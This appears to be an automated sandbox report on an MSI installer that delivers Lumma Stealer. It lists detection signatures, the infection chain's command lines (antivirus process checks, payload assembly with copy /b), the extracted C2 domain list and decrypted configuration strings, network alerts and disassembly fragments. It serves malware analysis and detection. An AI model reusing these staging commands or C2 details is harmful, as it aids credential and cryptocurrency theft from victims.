Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
NB4EASbynx.msi

Overview

General Information

Sample name:NB4EASbynx.msi
renamed because original name is a hash value
Original sample name:3b48c90d4a283982ced898df9570894b.msi
Analysis ID:1481471
MD5:3b48c90d4a283982ced898df9570894b
SHA1:ed07663c40d54fff42af99c2969971a3493f1bf7
SHA256:3ed535bbcd9d4980ec8bc60cd64804e9c9617b7d88723d3b05e6ad35821c3fe7
Tags:LummaStealermsi
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for submitted file
Sigma detected: Search for Antivirus process
Yara detected LummaC Stealer
C2 URLs / IPs found in malware configuration
Drops PE files with a suspicious file extension
Drops large PE files
Found API chain indicative of debugger detection
Found many strings related to Crypto-Wallets (likely being stolen)
Found stalling execution ending in API Sleep call
Injects a PE file into a foreign processes
LummaC encrypted strings found
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks for available system drives (often done to infect USB drives)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
File is packed with WinRar
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for user specific document files
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Suspicious Copy From or To System Directory
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • msiexec.exe (PID: 5584 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\NB4EASbynx.msi" MD5: E5DA170027542E25EDE42FC54C929077)
    • MSI53B9.tmp (PID: 3212 cmdline: "C:\Users\user\AppData\Local\Temp\MSI53B9.tmp" -pqwerty2023 -s1 MD5: 689E01A34A731C6F051E39CD55FB71AD)
      • SymposiumTaiwan.exe (PID: 1020 cmdline: "C:\Users\user\Desktop\SymposiumTaiwan.exe" MD5: 9A721DDFD6C94D81EF78858A85F1083A)
        • cmd.exe (PID: 6792 cmdline: "C:\Windows\System32\cmd.exe" /k copy Open Open.cmd & Open.cmd & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 3500 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • tasklist.exe (PID: 6772 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
          • findstr.exe (PID: 5112 cmdline: findstr /I "wrsa.exe opssvc.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
          • tasklist.exe (PID: 5908 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
          • findstr.exe (PID: 4544 cmdline: findstr /I "avastui.exe avgui.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
          • cmd.exe (PID: 7156 cmdline: cmd /c md 558563 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • findstr.exe (PID: 1812 cmdline: findstr /V "cbsinchhavefcc" Basketball MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
          • cmd.exe (PID: 4896 cmdline: cmd /c copy /b Upc + Beverages + Hero + Displaying + Version + Fm + Emotions 558563\k MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • Dicks.pif (PID: 2836 cmdline: 558563\Dicks.pif 558563\k MD5: 6EE7DDEBFF0A2B78C7AC30F6E00D1D11)
            • Dicks.pif (PID: 3248 cmdline: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif MD5: 6EE7DDEBFF0A2B78C7AC30F6E00D1D11)
          • timeout.exe (PID: 5224 cmdline: timeout 5 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
  • msiexec.exe (PID: 3896 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)
    • msiexec.exe (PID: 3568 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 4C0B4EE6A62E23CFF044B1F01FFADBEC C MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • msiexec.exe (PID: 6860 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 6E4C0896962209942EF6224878A6EC23 MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["indexterityszcoxp.shop", "lariatedzugspd.shop", "callosallsaospz.shop", "outpointsozp.shop", "liernessfornicsa.shop", "upknittsoappz.shop", "shepherdlyopzc.shop", "unseaffarignsk.shop", "warrantelespsz.shop"], "Build id": "DlgY9i--"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    SourceRuleDescriptionAuthorStrings
    00000017.00000003.3156346560.00000000011C6000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000017.00000003.3198982673.00000000011C6000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000017.00000003.3156175797.00000000011C6000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000017.00000003.3155203388.00000000011C3000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            00000017.00000003.3182152456.00000000011C5000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              Click to see the 9 entries

              System Summary

              barindex
              Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: 558563\Dicks.pif 558563\k, CommandLine: 558563\Dicks.pif 558563\k, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif, NewProcessName: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif, OriginalFileName: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif, ParentCommandLine: "C:\Windows\System32\cmd.exe" /k copy Open Open.cmd & Open.cmd & exit, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6792, ParentProcessName: cmd.exe, ProcessCommandLine: 558563\Dicks.pif 558563\k, ProcessId: 2836, ProcessName: Dicks.pif
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /k copy Open Open.cmd & Open.cmd & exit, CommandLine: "C:\Windows\System32\cmd.exe" /k copy Open Open.cmd & Open.cmd & exit, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\SymposiumTaiwan.exe" , ParentImage: C:\Users\user\Desktop\SymposiumTaiwan.exe, ParentProcessId: 1020, ParentProcessName: SymposiumTaiwan.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /k copy Open Open.cmd & Open.cmd & exit, ProcessId: 6792, ProcessName: cmd.exe

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: Process startedAuthor: Joe Security: Data: Command: findstr /I "avastui.exe avgui.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe" , CommandLine: findstr /I "avastui.exe avgui.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /k copy Open Open.cmd & Open.cmd & exit, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6792, ParentProcessName: cmd.exe, ProcessCommandLine: findstr /I "avastui.exe avgui.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe" , ProcessId: 4544, ProcessName: findstr.exe
              No Snort rule has matched
              Timestamp:2024-07-25T09:54:05.626887+0200
              SID:2028371
              Source Port:49722
              Destination Port:443
              Protocol:TCP
              Classtype:Unknown Traffic
              Timestamp:2024-07-25T09:54:09.471784+0200
              SID:2028371
              Source Port:49725
              Destination Port:443
              Protocol:TCP
              Classtype:Unknown Traffic
              Timestamp:2024-07-25T09:54:07.393267+0200
              SID:2054653
              Source Port:49723
              Destination Port:443
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:2024-07-25T09:54:08.625645+0200
              SID:2048094
              Source Port:49724
              Destination Port:443
              Protocol:TCP
              Classtype:Malware Command and Control Activity Detected
              Timestamp:2024-07-25T09:54:13.980250+0200
              SID:2028371
              Source Port:49728
              Destination Port:443
              Protocol:TCP
              Classtype:Unknown Traffic
              Timestamp:2024-07-25T09:54:06.322611+0200
              SID:2054653
              Source Port:49722
              Destination Port:443
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:2024-07-25T09:54:08.313743+0200
              SID:2028371
              Source Port:49724
              Destination Port:443
              Protocol:TCP
              Classtype:Unknown Traffic
              Timestamp:2024-07-25T09:53:23.686115+0200
              SID:2022930
              Source Port:443
              Destination Port:49718
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:2024-07-25T09:54:06.823663+0200
              SID:2028371
              Source Port:49723
              Destination Port:443
              Protocol:TCP
              Classtype:Unknown Traffic
              Timestamp:2024-07-25T09:54:17.088274+0200
              SID:2028371
              Source Port:49729
              Destination Port:443
              Protocol:TCP
              Classtype:Unknown Traffic
              Timestamp:2024-07-25T09:54:10.700182+0200
              SID:2028371
              Source Port:49726
              Destination Port:443
              Protocol:TCP
              Classtype:Unknown Traffic
              Timestamp:2024-07-25T09:54:18.413471+0200
              SID:2054653
              Source Port:49729
              Destination Port:443
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:2024-07-25T09:52:45.853828+0200
              SID:2022930
              Source Port:443
              Destination Port:49712
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:2024-07-25T09:54:12.517765+0200
              SID:2028371
              Source Port:49727
              Destination Port:443
              Protocol:TCP
              Classtype:Unknown Traffic

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: https://warrantelespsz.shop:443/apiAvira URL Cloud: Label: malware
              Source: https://warrantelespsz.shop/apiAvira URL Cloud: Label: malware
              Source: 23.2.Dicks.pif.e60000.1.raw.unpackMalware Configuration Extractor: LummaC {"C2 url": ["indexterityszcoxp.shop", "lariatedzugspd.shop", "callosallsaospz.shop", "outpointsozp.shop", "liernessfornicsa.shop", "upknittsoappz.shop", "shepherdlyopzc.shop", "unseaffarignsk.shop", "warrantelespsz.shop"], "Build id": "DlgY9i--"}
              Source: NB4EASbynx.msiReversingLabs: Detection: 18%
              Source: 00000013.00000003.3131801499.00000000043FC000.00000004.00000800.00020000.00000000.sdmpString decryptor: indexterityszcoxp.shop
              Source: 00000013.00000003.3131801499.00000000043FC000.00000004.00000800.00020000.00000000.sdmpString decryptor: lariatedzugspd.shop
              Source: 00000013.00000003.3131801499.00000000043FC000.00000004.00000800.00020000.00000000.sdmpString decryptor: callosallsaospz.shop
              Source: 00000013.00000003.3131801499.00000000043FC000.00000004.00000800.00020000.00000000.sdmpString decryptor: outpointsozp.shop
              Source: 00000013.00000003.3131801499.00000000043FC000.00000004.00000800.00020000.00000000.sdmpString decryptor: liernessfornicsa.shop
              Source: 00000013.00000003.3131801499.00000000043FC000.00000004.00000800.00020000.00000000.sdmpString decryptor: upknittsoappz.shop
              Source: 00000013.00000003.3131801499.00000000043FC000.00000004.00000800.00020000.00000000.sdmpString decryptor: shepherdlyopzc.shop
              Source: 00000013.00000003.3131801499.00000000043FC000.00000004.00000800.00020000.00000000.sdmpString decryptor: unseaffarignsk.shop
              Source: 00000013.00000003.3131801499.00000000043FC000.00000004.00000800.00020000.00000000.sdmpString decryptor: warrantelespsz.shop
              Source: 00000013.00000003.3131801499.00000000043FC000.00000004.00000800.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
              Source: 00000013.00000003.3131801499.00000000043FC000.00000004.00000800.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
              Source: 00000013.00000003.3131801499.00000000043FC000.00000004.00000800.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
              Source: 00000013.00000003.3131801499.00000000043FC000.00000004.00000800.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
              Source: 00000013.00000003.3131801499.00000000043FC000.00000004.00000800.00020000.00000000.sdmpString decryptor: Workgroup: -
              Source: 00000013.00000003.3131801499.00000000043FC000.00000004.00000800.00020000.00000000.sdmpString decryptor: DlgY9i--
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 23_2_00E7673F CryptUnprotectData,23_2_00E7673F
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49722 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49723 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49724 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49725 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49726 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49727 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49728 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49729 version: TLS 1.2
              Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: MSI53B9.tmp, 00000004.00000000.2201198694.00000000008A0000.00000002.00000001.01000000.00000003.sdmp, MSI53B9.tmp, 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmp, NB4EASbynx.msi, 68e8f1.msi.2.dr, MSI53B9.tmp.1.dr, 68e8ef.msi.2.dr
              Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\AICustAct.pdb source: NB4EASbynx.msi, MSIEA95.tmp.2.dr, MSIC706.tmp.1.dr, MSI52AE.tmp.1.dr, 68e8f1.msi.2.dr, MSI527E.tmp.1.dr, MSI523E.tmp.1.dr, MSIEAB6.tmp.2.dr, MSI4F6E.tmp.1.dr, MSI5124.tmp.1.dr
              Source: C:\Windows\System32\msiexec.exeFile opened: z:Jump to behavior
              Source: C:\Windows\System32\msiexec.exeFile opened: x:Jump to behavior
              Source: C:\Windows\System32\msiexec.exeFile opened: v:Jump to behavior
              Source: C:\Windows\System32\msiexec.exeFile opened: t:Jump to behavior
              Source: C:\Windows\System32\msiexec.exeFile opened: r:Jump to behavior
              Source: C:\Windows\System32\msiexec.exeFile opened: p:Jump to behavior
              Source: C:\Windows\System32\msiexec.exeFile opened: n:Jump to behavior
              Source: C:\Windows\System32\msiexec.exeFile opened: l:Jump to behavior
              Source: C:\Windows\System32\msiexec.exeFile opened: j:Jump to behavior
              Source: C:\Windows\System32\msiexec.exeFile opened: h:Jump to behavior
              Source: C:\Windows\System32\msiexec.exeFile opened: f:Jump to behavior
              Source: C:\Windows\System32\msiexec.exeFile opened: b:Jump to behavior
              Source: C:\Windows\System32\msiexec.exeFile opened: y:Jump to behavior
              Source: C:\Windows\System32\msiexec.exeFile opened: w:Jump to behavior
              Source: C:\Windows\System32\msiexec.exeFile opened: u:Jump to behavior
              Source: C:\Windows\System32\msiexec.exeFile opened: s:Jump to behavior
              Source: C:\Windows\System32\msiexec.exeFile opened: q:Jump to behavior
              Source: C:\Windows\System32\msiexec.exeFile opened: o:Jump to behavior
              Source: C:\Windows\System32\msiexec.exeFile opened: m:Jump to behavior
              Source: C:\Windows\System32\msiexec.exeFile opened: k:Jump to behavior
              Source: C:\Windows\System32\msiexec.exeFile opened: i:Jump to behavior
              Source: C:\Windows\System32\msiexec.exeFile opened: g:Jump to behavior
              Source: C:\Windows\System32\msiexec.exeFile opened: e:Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: c:Jump to behavior
              Source: C:\Windows\System32\msiexec.exeFile opened: a:Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmpCode function: 4_2_0087A273 FindFirstFileW,FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,4_2_0087A273
              Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmpCode function: 4_2_0088A537 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,4_2_0088A537
              Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmpCode function: 4_2_00897D78 FindFirstFileExA,4_2_00897D78
              Source: C:\Users\user\Desktop\SymposiumTaiwan.exeCode function: 8_2_00406301 FindFirstFileW,FindClose,8_2_00406301
              Source: C:\Users\user\Desktop\SymposiumTaiwan.exeCode function: 8_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,8_2_00406CC7
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 19_2_00094005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,19_2_00094005
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 19_2_0009494A GetFileAttributesW,FindFirstFileW,FindClose,19_2_0009494A
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 19_2_0009FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,19_2_0009FA36
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 19_2_0009C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,19_2_0009C2FF
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 19_2_0009CD14 FindFirstFileW,FindClose,19_2_0009CD14
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 19_2_0009CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,19_2_0009CD9F
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 19_2_0009F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,19_2_0009F5D8
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 19_2_0009F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,19_2_0009F735
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 19_2_00093CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,19_2_00093CE2
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 23_2_00094005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,23_2_00094005
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 23_2_0009C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,23_2_0009C2FF
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 23_2_0009494A GetFileAttributesW,FindFirstFileW,FindClose,23_2_0009494A
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 23_2_0009CD14 FindFirstFileW,FindClose,23_2_0009CD14
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 23_2_0009CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,23_2_0009CD9F
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 23_2_0009F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,23_2_0009F5D8
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 23_2_0009F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,23_2_0009F735
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 23_2_0009FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,23_2_0009FA36
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 23_2_00093CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,23_2_00093CE2
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 4x nop then mov ecx, dword ptr [esp+00000890h]23_2_00E7E2FC
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 4x nop then mov eax, dword ptr [esp+18h]23_2_00E994D5
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 4x nop then movzx ebx, dx23_2_00E855E0
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 4x nop then mov eax, dword ptr [esi+18h]23_2_00E855E0
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 4x nop then mov ecx, dword ptr [esp]23_2_00E9C5E0
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 4x nop then jmp ecx23_2_00E75550
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 4x nop then mov ecx, dword ptr [esp]23_2_00E806FC
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 4x nop then mov byte ptr [edi], al23_2_00E867C8
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 4x nop then mov eax, dword ptr [esi+18h]23_2_00E867C8
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 4x nop then cmp dword ptr [eax+esi*8], 11081610h23_2_00E808D4
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 4x nop then mov word ptr [eax], cx23_2_00E779F0
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 4x nop then mov eax, dword ptr [esi+30h]23_2_00E76B30
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 4x nop then mov byte ptr [ecx], al23_2_00E76B30
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 4x nop then mov byte ptr [ecx], al23_2_00E76B30
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 4x nop then jmp ecx23_2_00E96EC6
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 4x nop then mov ecx, dword ptr [esi]23_2_00E6EFD0
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 4x nop then mov byte ptr [ecx], bl23_2_00E6EFD0
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 4x nop then mov eax, dword ptr [esi+18h]23_2_00E871C9
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 4x nop then inc ebx23_2_00E753E0
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 4x nop then mov ecx, dword ptr [esp]23_2_00E973E0
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 4x nop then mov word ptr [eax], cx23_2_00E773F2
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 4x nop then movzx ebx, word ptr [ebp+eax*4+00h]23_2_00E68380
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 4x nop then jmp ecx23_2_00E824D3
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 4x nop then mov eax, dword ptr [esp]23_2_00E70497
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 4x nop then mov eax, dword ptr [esp+18h]23_2_00E995DA
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 4x nop then mov ebx, eax23_2_00E635B0
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 4x nop then mov eax, dword ptr [esp+18h]23_2_00E994D5
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 4x nop then jmp ecx23_2_00E736A6
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 4x nop then mov eax, dword ptr [esp+04h]23_2_00E9B660
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 4x nop then movzx ebx, byte ptr [edx]23_2_00E90600
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 4x nop then mov eax, dword ptr [esp+1Ch]23_2_00E997FB
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 4x nop then inc edi23_2_00E717FC
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 4x nop then mov eax, dword ptr [esp+18h]23_2_00E727DB
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 4x nop then mov eax, dword ptr [esp]23_2_00E727DB
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 4x nop then movzx edi, byte ptr [ecx+esi]23_2_00E63760
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 4x nop then mov eax, dword ptr [esi+18h]23_2_00E87741
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 4x nop then movzx eax, word ptr [esi+ecx]23_2_00E95730
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 4x nop then mov byte ptr [edi], al23_2_00E86894
